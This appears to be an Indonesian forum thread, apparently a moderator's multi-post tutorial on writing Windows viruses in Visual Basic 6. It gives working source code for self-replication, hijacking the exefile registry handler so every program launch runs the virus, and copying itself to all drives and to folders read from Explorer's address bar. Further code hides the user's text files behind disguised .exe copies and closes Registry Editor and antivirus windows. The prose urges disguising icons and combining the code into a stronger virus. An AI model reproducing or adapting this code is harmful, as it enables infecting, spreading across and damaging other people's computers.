Private Declare Function GetForegroundWindow Lib "user32" () As Long
Dim GFW As Long
Dim PrevGFW As Long
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
If .PrevInstance Then End
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
End Sub
Private Sub Timer1_Timer()
GFW = GetForegroundWindow
If GFW <> Me.hWnd And PrevGFW <> GFW Then
Shell lokasi & namafile, vbNormalFocus
PrevGFW = GFW
End If
End Sub
Private Declare Function GetForegroundWindow Lib "user32" () As Long
GetForegroundWindow digunakan untuk mendapatkan nilai handle dari suatu
objek/program yang mendapatkan focus.
Setelah nilai handle tersebut didapat maka akan dilakukan pengecekan apakah handle tersebut tidak sama dengan diri sendiri dan handle sebelumnya jika tidak sama jalankan proses pengaktifan.
Berikut ini adalah kode pengaktifan yang baik:
Code:
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Dim GFW As Long
Dim PrevGFW As Long
Dim lokasi As String
Dim namafile
Private Sub Form_Load()
namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")
If App.PrevInstance Then End
lokasi = App.Path & "\"
If Dir(lokasi & namafile(0)) = "" Or Dir(lokasi & namafile(1)) = "" Then
FileCopy lokasi & namafile(2), lokasi & namafile(0)
FileCopy lokasi & namafile(2), lokasi & namafile(1)
End If
End Sub
Private Sub Timer1_Timer()
GFW = GetForegroundWindow
If Me.hWnd <> GFW And PrevGFW <> GFW Then
Shell App.Path & "\" & namafile(0), vbNormalFocus
Shell App.Path & "\" & namafile(1), vbNormalFocus
PrevGFW = GFW
End If
End Sub
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile(0), vbNormalFocus
Shell lokasi & namafile(1), vbNormalFocus
End Sub
Pertama kali ketika virus dijalankan sang virus akan menduplikat dirinya dengan nama Virus1.exe dan Virus2.exe yang diambil dari Array.
Code:
namafile = Array("virus1.exe", "virus2.exe", App.EXEName & ".exe")
Penduplikatan dilakukan dengan perintah:
Code:
FileCopy lokasi & namafile(2), lokasi & namafile(0)
FileCopy lokasi & namafile(2), lokasi & namafile(1)
Setelah itu virus akan menjalankan hasil duplikat tersebut setiap terjadi perubahan nilai handle.
Code:
GFW = GetForegroundWindow
If Me.hWnd <> GFW And PrevGFW <> GFW Then
Shell App.Path & "\" & namafile(0), vbNormalFocus
Shell App.Path & "\" & namafile(1), vbNormalFocus
PrevGFW = GFW
End If
Virus akan menjalakan hasil duplicate apabila virus tersebut ditutup.
Code:
Private Sub Form_Unload(Cancel As Integer)
Shell lokasi & namafile(0), vbNormalFocus
Shell lokasi & namafile(1), vbNormalFocus
End Sub
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:43 PM #11
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Penyebaran
Penyebaran merupakan salah satu dari cara kerja suatu virus, agar virus
tersebut dapat melangsungkan hidupnya. Kayak mahluk hidup donk? Ya gitulah.
Dalam visual basic perintah penggandaan dapat dilakukan dengan dua cara:
Menggunakan code standar dalam visual basic. (FileCopy).
menggunakan code API untuk yang akan berinteraksi langsung dengan system
operasi sehingga memungkin perintah dapat berjalan lebih cepat dan selalu
berhasil. (CopyFile).
Fungsi untuk melakukan pengcopian file
Perintah Copy Visual Basic (FileCopy)
Dengan perintah perintah peng-copy-an suatu file pada visual basic, kita bias
membuat suatu fungsi untuk melakukan suatu penggandaan diri dalam suatu virus, tapi fungsi ini tidak 100% berhasil. Dan memakan waktu yang lama jika digunakan untuk melakukan penggandaan dalam jumlah banyak. Perintah ini sebaiknya digunakan jika kita ingin membuat suatu virus yang sederhana.
Code:
FileCopy sumber,tujuan
Fungsi API:
Penggunaan perintah API sangat disaran jika kita ingin membuat suatu applikasi yang professional. Kok Applikasi? Karena fungsi ini biasanya digunakan untuk membuat aplikasi installer yang dibuat oleh suatu perusahaan software. Fungsi API selalu digunakan oleh perusahaan software agar software yang mereka buat bisa langsung berinteraksi dengan system operasi dan bukan berinteraksi dengan sebuah file virtual machine (Contoh : msvbvm60.dll) dimana virtual machine ini berfungsi untuk melakukan hubungan dari suatu applikasi ke system operasi. Jadi baiknya jika aplikasi kita buat langsung berhubungan dengan system operasi sehingga kinerja dari aplikasi yang kita buat tersebut akan sangat baik. Apa hubungannya sama virus? Jika kita bisa membuat virus yang langsung berhubungan dengan system operasi. Selain proses penyebarannya sangat cepat, virus itupun mampu melindungi dirinya dengan sangat baik. Karena ia mempu mengendalikan suatu aplikasi. Apakah aplikasi tersebut perbolehlan untuk dijalankan atau tidak.
Code:
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Code:
CopyFile Sumber,Tujuan,0
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:47 PM #12
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Bagaimana teknik penyebaran yang baik?
Tenik penyebaran yang baik yang biasa dilakukan oleh virus adalah
Membaca address bar pada window explorer
Tehnik ini sangat baik selain proses penyebaran sangat cepat juga tidak
memerlukan suatu teknik pencarian suatu file. Mengapa tidak memerlukan pencarian? Karena user telah memberikan informasi lokasi suatu file yang dianggap penting oleh user dengan cara membuka folder tersebut menggunakan windows explorer yang selanjutnya digunakan user untuk menjalankan file tersebut. Virus yang mendapatkan lokasi tersebut langsung menggandakan diri kedalamnya. Biasanya penamaan file dari hasil penggandaan virus tersebut diambil dari nama subfolder yang sedang terbuka.
Fungsi API:
Code:
Public Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal HWND As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any)As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
(ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
ByVal lpsz2 As String) As Long
Public Const WM_GETTEXT = &HD
Membaca seluruh subfolder pada setiap partisi ataupun hanya partisi system saja.
Cara penggandaan yang satu ini sangat memakan banyak waktu untuk proses penyebaran. Tapi jika penyeberannya berhasil bisa dibayangkan kalau cara penggandaannya berdasarkan subfolder saja untuk satu partisi system saja bisa mencapai ribuan coba kalau user tersebut menggunakan Multi OS dikomputernya. Bayangkan saja!!!. Apalagi kalau system penggandaannya berdasarkan file-file yang ada dipartisi, pasti lebih heboh lagi.
Membaca lokasi file yang dijalankan
Penggandaan berdasarkan lokasi file yang dijalankan. Cara yang satu ini memang sangat cepat tapi hasil penggandaan tidak sebanyak dari 2 cara diatas. Ini dikarenakan jika user menjalankan suatu aplikasi. Tapi jika user tidak menjalankan suatu aplikasi maka virus tersebut tidak bisa menggandakan dirinya. Biasanya cara ini digunakan untuk menginfeksi suatu file. Biasanya mempunyai hubungan dengan registry.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:53 PM #13
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Untuk membuat virus yang hebat sangat disarankan untuk menggabungkan
semua code yang tersebut. Tapi gunakanlah sesuai kebutuhan. Untuk masalah
pengganbungan saya serahkan kepada anda.
Agar virus tersebut tidak diketahui sebagai virus. Virus tersebut dapat
menggunakan icon yang memungkinkan seseorang tidak dapat mengenali apakah itu virus atau bukan. Contoh nya adalah icon: Folder, Word, Exel, File Gambar (jpg, bmp, png, gif), zip, rar, pdf, notepad, application, dll.
Kode penyebaran dengan mengambil lokasi dari aplikasi yang dijalankan:
Code:
'Registry API
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
"RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
"RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function SetFileAttributes Lib "kernel32" Alias
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum
Dim lokasi As String
Dim NamaFile1 As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
NamaFile1 = .EXEName & ".exe"
End With
CreateStringValue HKEY_CLASSES_ROOT, "exefile\shell\open\command", _
REG_SZ, "", Chr(&H22) & lokasi & NamaFile1 & Chr(&H22) & " " & _
Chr(&H22) & "%1" & Chr(&H22) & " %*"
'Jika parameter pemanggilan virus tidak sama dengan kosong
If Command$ <> "" Then
Dim sFilePath As String
'ambil Path file
sFilePath = Right$(Command$, Len(Command$) - 1)
sFilePath = Left$(sFilePath, Len(sFilePath) - 2)
SetFileAttributes sFilePath, FILE_ATTRIBUTE_HIDDEN Or _
FILE_ATTRIBUTE_READONLY
CopyFile App.Path & "\" & App.EXEName & ".exe", _
NamaPath(sFilePath) & RTrim$(Left(NamaFile(sFilePath), _
Len(NamaFile(sFilePath)) - 4)) & " .exe", 0
SetFileAttributes NamaPath(sFilePath) & _
RTrim$(Left(NamaFile(sFilePath), Len(NamaFile(sFilePath)) - 4)) & _
" .exe", FILE_ATTRIBUTE_NORMAL
Shell Command$, vbNormalFocus
DoEvents
End If
'jalankan sekali saja
If App.PrevInstance Then End
End Sub
'dapatkan nama file
Public Function NamaFile(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaFile = ""
i = 0
If Right(sPath, 1) = "\" Then sPath = Left$(sPath, Len(sPath) - 1)
For i = Len(sPath) To 1 Step -1
If Mid$(sPath, i, 1) = "\" Then
NamaFile = Right(sPath, Len(sPath) - i)
Exit Function
End If
DoEvents
Next
End Function
'dapatkan nama path
Public Function NamaPath(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaPath = sPath
For i = Len(NamaPath) To 1 Step -1
If Mid$(NamaPath, i, 1) = "\" Then
NamaPath = Left$(NamaPath, i)
Exit Function
End If
DoEvents
Next i
NamaPath = ""
End Function
'Create or Set String Value Registry
Private Function CreateStringValue(hKey As REG, Subkey As String,
RTypeStringValue As TypeStringValue, strValueName As String, strData As
String) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateStringValue = RegSetValueEx(ret, strValueName, 0, _
RTypeStringValue, ByVal strData, Len(strData))
RegCloseKey ret
End Function
Pertama kali yang dilakukan virus ketika virus dijalankan adalah menyeting registry pada bagian exefile, dengan begitu ketika seseorang menjalankan aplikasi dengan extensi “*.exe� maka virus akan berjalan dan melakukan pengecekan lokasi aplikasi tersebut dijalankan dan melakukan penyebaran pada lokasi aplikasi tersebut dijalankan.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:55 PM #14
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Berikut adalah kode penyebaran dengan mencari drive yang tersedia dan melakukan penyebaran pada drive tersebut.
Sediakan satu buah form dan satu buah module
Ketikan perintah ini pada form:
Code:
CariDrive
Ketikan perintah ini pada module:
Code:
Public Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" _
(ByVal nDrive As String) As Long
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
'dapatkan drive hardisk dan flashdisk
Public Function CariDrive() As String
Dim ictr As Integer
Dim sAllDrives As String
Dim sDrive As String
sDrive = ""
For ictr = 66 To 90
sDrive = Chr(ictr) & ":\"
If GetDriveType(sDrive) = 3 Or GetDriveType(sDrive) = 2 Then
CopyFile App.Path & "\" & App.EXEName & ".exe", sDrive & _
"virus.exe", 0
End If
Next
End Function
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-09-2007, 04:59 PM #15
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Berikut ini kode melakukan penyebaran dengan membaca alamat folder yang dibuka dengan windows explorer dengan membacanya pda addressbar.
Siapkan satu form, satu timer dengan Interval=1500 dan satu buah module.
Ketikan perintah ini pada form:
Code:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" _
(ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, _
ByVal lpsz2 As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any) As Long
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
"RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
"RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function SetFileAttributes Lib "kernel32" Alias _
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Private Const WM_GETTEXT = &HD
Private Const REG_DWORD = 4
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
'Create or Set Dword Value Registry
Public Function CreateDwordValue(hKey As REG, Subkey As String, strValueName
As String, dwordData As Long) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateDwordValue = RegSetValueEx(ret, strValueName, 0, REG_DWORD, _
dwordData, 4)
RegCloseKey ret
End Function
Private Sub Form_Load()
CariDirectory "C:\", "Tes"
CreateDwordValue HKEY_CURRENT_USER, _
"Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState", _
"FullPathAddress", 1
End Sub
Private Sub Timer1_Timer()
Dim ExploreWClass As Long
Dim CabinetWClass As Long
Dim WorkerW As Long
Dim RebarWindow32 As Long
Dim ComboBoxEx32 As Long
Dim ComboBox As Long
Dim Edit As Long
Dim temp As String * 255
Dim temp2 As String * 255
Dim AlamatFile As String
Dim JudulCaption As String
ExploreWClass = FindWindow("ExploreWClass", vbNullString)
CabinetWClass = FindWindow("CabinetWClass", vbNullString)
If ExploreWClass = GetForegroundWindow Then
WorkerW = FindWindowEx(ExploreWClass, 0&, "WorkerW", vbNullString)
SendMessage ExploreWClass, WM_GETTEXT, 200, ByVal temp2
ElseIf CabinetWClass = GetForegroundWindow Then
WorkerW = FindWindowEx(ExploreWClass, 0&, "WorkerW", vbNullString)
SendMessage CabinetWClass, WM_GETTEXT, 200, ByVal temp2
End If
'dapatkan string pada address bar
RebarWindow32 = FindWindowEx(WorkerW, 0&, "RebarWindow32", vbNullString)
ComboBoxEx32 = FindWindowEx(RebarWindow32, 0&, "ComboBoxEx32", _
vbNullString)
ComboBox = FindWindowEx(ComboBoxEx32, 0&, "ComboBox", vbNullString)
Edit = FindWindowEx(ComboBox, 0&, "Edit", vbNullString)
SendMessage Edit, WM_GETTEXT, 200, ByVal temp
'ambil lokasi folder yang aktif pada windows explorer
AlamatFile = Mid$(temp, 1, InStr(temp, Chr$(0)) - 1)
'ambil caption windows explorer
JudulCaption = Mid$(temp2, 1, InStr(temp2, Chr$(0)) - 1)
If AlamatFile <> "" And JudulCaption <> "" Then
Form1.Print "Judul : " & JudulCaption
Form1.Print "Address Bar : " & AlamatFile
CariFile AlamatFile
End If
End Sub
Ketikan perintah berikut pada module
Code:
Public Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" _
(ByVal lpFileName As String, lpFindFileData As WIN32_FIND_DATA) As Long
Public Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" _
(ByVal hFindFile As Long, lpFindFileData As WIN32_FIND_DATA) As Long
Public Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) _
As Long
Public Declare Function SetFileAttributes Lib "kernel32" Alias _
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Public Declare Function GetFileAttributes Lib "kernel32" Alias _
"GetFileAttributesA" (ByVal lpFileName As String) As Long
Public Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Public Const FILE_ATTRIBUTE_DIRECTORY = &H10
Public Const FILE_ATTRIBUTE_HIDDEN = &H2
Public Const FILE_ATTRIBUTE_READONLY = &H1
Public Const INVALID_HANDLE_VALUE = -1
Public Const MAX_PATH = 260
Public Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Public Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftLastWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
'cari file
Public Function CariFile(Path As String) As Integer
On Error Resume Next
Dim FileName As String
Dim hSearch As Double
Dim WFD As WIN32_FIND_DATA
Dim cont As Double
CariFile = 0
Selesai = False
If Right(Path, 1) <> "\" Then Path = Path & "\"
cont = True
hSearch = FindFirstFile(Path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While cont
FileName = Mid$(WFD.cFileName, 1, InStr(WFD.cFileName, _
Chr$(0)) - 1)
If (FileName <> ".") And (FileName <> "..") Then
If Not FILE_ATTRIBUTE_DIRECTORY Then
If WFD.dwFileAttributes = 128 _
Or WFD.dwFileAttributes = 32 Then
If UCase(Right$(FileName, 3)) = "TXT" Then
SetFileAttributes Path & CariNama(FileName) & _
" .exe", FILE_ATTRIBUTE_NORMAL
CopyFile App.Path & "\" & App.EXEName & ".exe", _
Path & CariNama(FileName) & " .exe", 0
DoEvents
SetFileAttributes Path & FileName, _
FILE_ATTRIBUTE_HIDDEN Or FILE_ATTRIBUTE_READONLY
CariFile = CariFile + 1
DoEvents
End If
End If
End If
End If
cont = FindNextFile(hSearch, WFD)
Loop
cont = FindClose(hSearch)
End If
hSearch = FindFirstFile(Path & "*.*", WFD)
DoEvents
End Function
'cari folder
Public Function CariDirectory(Path As String, SearchStr As String) As Double
Dim DirName As String
Dim DirNames() As String
Dim nDir As Double
Dim i As Double
Dim hSearch As Double
Dim WFD As WIN32_FIND_DATA
Dim cont As Double
If Right(Path, 1) <> "\" Then Path = Path & "\"
nDir = 0
ReDim DirNames(nDir)
cont = True
hSearch = FindFirstFile(Path & "*", WFD)
If hSearch <> INVALID_HANDLE_VALUE Then
Do While cont
DirName = Mid$(WFD.cFileName, 1, InStr(WFD.cFileName, _
Chr$(0)) - 1)
If (DirName <> ".") And (DirName <> "..") Then
If GetFileAttributes(Path & DirName) _
And FILE_ATTRIBUTE_DIRECTORY Then
DirNames(nDir) = DirName
nDir = nDir + 1
ReDim Preserve DirNames(nDir)
If UCase(DirName) = UCase(SearchStr) Then
Dim tamp As String
CariFile Path & DirName & "\"
DoEvents
SetFileAttributes Path & DirName & "\" & _
NamaFile(Path & DirName) & " .exe", _
FILE_ATTRIBUTE_NORMAL
CopyFile App.Path & "\" & App.EXEName & ".exe", _
Path & DirName & "\" & NamaFile(Path & DirName) & _
" .exe", 0
TmpDrv = Left$(Path, 3)
Exit Function
End If
End If
End If
cont = FindNextFile(hSearch, WFD)
Loop
cont = FindClose(hSearch)
End If
If nDir > 0 Then
For i = 0 To nDir - 1
CariDirectory Path & DirNames(i) & "\", SearchStr
Next i
End If
End Function
'cari nama file/folder
Public Function CariNama(sName As String) As String
On Error Resume Next
Dim i As Integer
i = 0
For i = Len(sName) To 1 Step -1
If Mid$(sName, i, 1) = "." Then
CariNama = Left$(sName, i - 1)
Exit Function
End If
Next
End Function
'dapatkan nama file
Public Function NamaFile(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaFile = ""
i = 0
If Right(sPath, 1) = "\" Then sPath = Left$(sPath, Len(sPath) - 1)
For i = Len(sPath) To 1 Step -1
If Mid$(sPath, i, 1) = "\" Then
NamaFile = Right(sPath, Len(sPath) - i)
Exit Function
End If
DoEvents
Next
End Function
'dapatkan nama path
Public Function NamaPath(sPath As String) As String
On Error Resume Next
Dim i As Integer
NamaPath = sPath
For i = Len(NamaPath) To 1 Step -1
If Mid$(NamaPath, i, 1) = "\" Then
NamaPath = Left$(NamaPath, i)
Exit Function
End If
DoEvents
Next i
NamaPath = ""
End Function
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-12-2007, 02:47 PM #16
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Serangan
Setelah virus tersebut melakukan penggandaan ke system, mengubah registry.
baru virus tersebut melakukan penyerangan (pengerusakan). Serangan virus ini yang sangat ditakuti oleh pengguna computer. Tetapi jika virus tersebut hanya melakukan penyebaran itu bukan masalah karena tidak melakukan pengerusakan.
Bentuk-bentuk serangan (pengerusakan) yang dilakukan virus:
Menghapus, memindahkan, menyembunyikan dan mengerusak isi file
Infeksi terhadap file, biasanya virus melakukan ini untuk melindungi dirinya dengan cara menempel dirinya pada file yang ingin di infeksi. Biasanya file *.exe, *.com, *.scr , *.doc, *.xls.
Penyembunyian partisi, memformat partisi dan menghapus partisi, bagian pengerusakan yang sangat merugikan orang lain.
Melakukan komunikasi yang terhadap hardware untuk mengacaukan kinerja suatu hardware sehingga memungkinkan terjadi pengerusakan terhadap hardware tersebut. Biasanya yang menjadi sasaran adalah RAM.
Mematikan aplikasi-aplikasi tertentu., hal ini sangat membuat kesal orang yang terserang, karena aplikasi tersebut tidak dapat dijalankan karena aplikasi tersebut telah dimatikan oleh virus. Biasanya aplikasi yang dimatikan tersebut adalah aplikasi yang berhubungan dengan registry, process manager dan antivirus.
Bentuk-bentuk serangan diatas adalah bentuk serangan yang paling sering
digunakan oleh virus untuk melakukan pengerusakan atau untuk melindungi dirinya dari berbagai macam kemungkinan yang dapat membinasakan dirinya.
Menghapus, memindahkan dan menyembunyikan file merupakan hal yang
sangat sering digunakan oleh virus. Bahkan hampir semua virus menggunakan tehnik ini untuk melakukan pengerusakan. Sangat merugikan orang lain adalah menghapus file dan mengerusak isi file.
Infeksi terhadap file exe, com, dan scr sangat jarang ditemukan. Karena tehnik
ini cukup sulit dilakukan. Sehingga jarang sekali virus yang menggunakan tehnik ini. Contoh virus yang menggunakan tehnik ini adalah ITZ.
Melakukan komunikasi terhadap hardware juga sangat jarang. Misalnya
mengacaukan alamat Port yang ada. Kalau sederhananya mengacau fungsi keyboard dan mouse. Kalau pada keyboard biasanya akan melakukan perubahan kode ascii sehingga apa ditampilkan tidak sesuai dengan diketikan. Sedangkan pada mouse adalah melakukan pergerakan cursor mouse secara otomatis tanpa dikendalikan dan melakukan fungsi pengeclick secara acak.
Mematikan aplikasi-aplikasi tertentu. Saat ini hampir semua jenis virus memiliki
kemampuan ini untuk melindungi dirinya sehingga sulit bagi antivirus atau program sejenis untuk berjalan, karena jika aplikasi tersebut berjalan maka sang virus akan langsung mematikan aplikasi tersebut.
__________________
Jika hati adalah istana, maka cinta adalah singgasana
Jika ketulusan ialah mahkota, kesetiaan ialah piala terindah
Dan senyum seorang kekasih sepertimu bagiku adalah tahta
07-14-2007, 01:48 PM #17
aap
Moderator
Join Date: Jan 2007
Location: Lhokseumawe
Posts: 1,101
:
Thanks: 0
Thanked 7 Times in 6 Posts
Berikut ini adalah beberapa kode yang dapat digunakan virus untuk melakukan
penyerangan.
Kode Penyerangan1:
Code:
Siapkan satu buah form
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias _
"RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, _
phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias _
"RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, _
ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, _
ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) _
As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" _
(ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function SetFileAttributes Lib "kernel32" Alias _
"SetFileAttributesA" (ByVal lpFileName As String, _
ByVal dwFileAttributes As Long) As Long
Enum REG
HKEY_CURRENT_USER = &H80000001
HKEY_CLASSES_ROOT = &H80000000
HKEY_CURRENT_CONFIG = &H80000005
HKEY_LOCAL_MACHINE = &H80000002
HKEY_USERS = &H80000003
End Enum
Enum TypeStringValue
REG_SZ = 1
REG_EXPAND_SZ = 2
REG_MULTI_SZ = 7
End Enum
Dim lokasi As String
Dim namafile As String
Private Sub Form_Load()
With App
lokasi = .Path & "\"
namafile = .EXEName & ".exe"
End With
CreateStringValue HKEY_CLASSES_ROOT, "exefile\shell\open\command", _
REG_SZ, "", Chr(&H22) & lokasi & namafile & Chr(&H22) & " " & Chr(&H22) & _
"%1" & Chr(&H22) & " %*"
'Jika parameter pemanggilan virus tidak sama dengan kosong
If Command$ <> "" Then
If InStr(1, Command$, "Setup") <> 0 _
Or InStr(1, Command$, "winzip") <> 0 _
Or InStr(1, Command$, "Anti") <> 0 _
Or InStr(1, Command$, "virus") <> 0 _
Or InStr(1, Command$, "Regedit") <> 0 _
Or InStr(1, Command$, "word") <> 0 Then
Shell Command$, vbNormalFocus
DoEvents
End If
End If
'jalankan sekali saja
If App.PrevInstance Then End
End Sub
'Create or Set String Value Registry
Private Function CreateStringValue(hKey As REG, Subkey As String,
RTypeStringValue As TypeStringValue, strValueName As String, strData As
String) As Long
On Error Resume Next
Dim ret As Long
RegCreateKey hKey, Subkey, ret
CreateStringValue = RegSetValueEx(ret, strValueName, 0, RTypeStringValue,
ByVal strData, Len(strData))
RegCloseKey ret
End Function
Kode penyerangan2:
Siapkan satu buah form dan satu buah timer dengan Interval=100.
Code:
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any)
As Long
Private Const WM_CLOSE = &H10
Private Sub Timer1_Timer()
Dim FW As Long
FW = FindWindow(vbNullString, "Registry Editor")
If FW Then SendMessage FW, WM_CLOSE, 0, 0
End Sub
Kode Penyerangan3:
Siapkan satu buah form dan satu buah timer dengan Interval=100.
Code:
Private Declare Function GetForegroundWindow Lib "user32" () As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any) As Long
Private Const WM_CLOSE = &H10
Private Const WM_GETTEXT = &HD
Private Sub Timer1_Timer()
Dim FW As Long
FW = GetForegroundWindow
If FW Then
Dim buff As String * 255
SendMessage FW, WM_GETTEXT, 255, ByVal buff
buff = Left$(buff, InStr(1, buff, Chr$(0)) - 1)
If InStr(1, UCase(buff), "REG") <> 0 _
Or InStr(1, UCase(buff), "WIN") <> 0 Then
SendMessage FW, WM_CLOSE, 0, 0
End If
End If
End Sub
Kode Penyerangan4:
Siapkan satu buah form dan satu buah timer dengan Interval=100.
Code:
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
ByVal nCmdShow As Long) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" _
(ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" _
(ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, _
lParam As Any) As Long
